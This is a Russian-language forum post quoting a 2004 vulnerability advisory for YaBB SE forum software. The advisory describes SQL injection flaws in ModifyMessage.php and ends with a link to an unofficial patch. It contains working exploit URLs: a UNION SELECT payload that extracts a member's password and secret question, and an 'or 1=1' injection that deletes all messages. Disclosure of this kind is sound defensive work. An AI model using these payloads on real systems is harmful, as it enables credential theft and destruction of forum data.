Svarga
Moderator | Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Цитата: 3 марта 2004 Программа: YaBB SE Version(s): 1.5.4, 1.5.5, 1.5.5b, и возможно другие версии Опасность: Высокая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в YaBB SE. Удаленный авторизованный пользователь может получить информацию о системе и может удалять информацию и файлы на целевой системе. 3 уязвимости обнаружены в 'ModifyMessage.php' файле. 1. SQL инъекция в '$msg' параметре: http://vulnhost/forum/index.php?board=1;action=modif y;threadid=1;quote=1;start=0; sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2, concat(passwd,%27-%27,secretQuestion),null,null,null,null,null,null, null,null, null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/* 2. SQL инъекция в параметре '$postid' в функции ModifyMessage2: postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/* Пример эксплоита, который удаляет все сообщения их базы данных: http://[target]/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0; sesc=aa e1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify; postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/* Множество других примером см. в источнике сообщения URL производителя: http://www.yabbse.org/ Решение: Неофициальное исправление можно скачать отсюда: http://www.elhacker.net/foro/attachments/yabbse1.5.5patch.rar | <!--offtop serg62 сорри, сюда запостил, чтоб дублей по YaBB SE не плодить -->
|